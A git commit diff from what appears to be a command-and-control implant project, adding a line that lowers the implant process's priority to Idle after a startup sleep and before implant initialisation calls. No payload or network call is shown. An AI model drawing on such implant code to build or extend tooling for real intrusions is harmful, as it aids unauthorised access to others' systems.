set proc to Idle for good measure!

This commit is contained in:
Gr1mmie 2022-03-24 18:56:41 -04:00
parent cce198924f
commit 6e987e0a7f
1 changed files with 2 additions and 0 deletions

View File

@ -66,6 +66,8 @@ namespace Implant
Thread.Sleep(10000);
Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.Idle;
GenImplantData();
ImplantCommandsInit();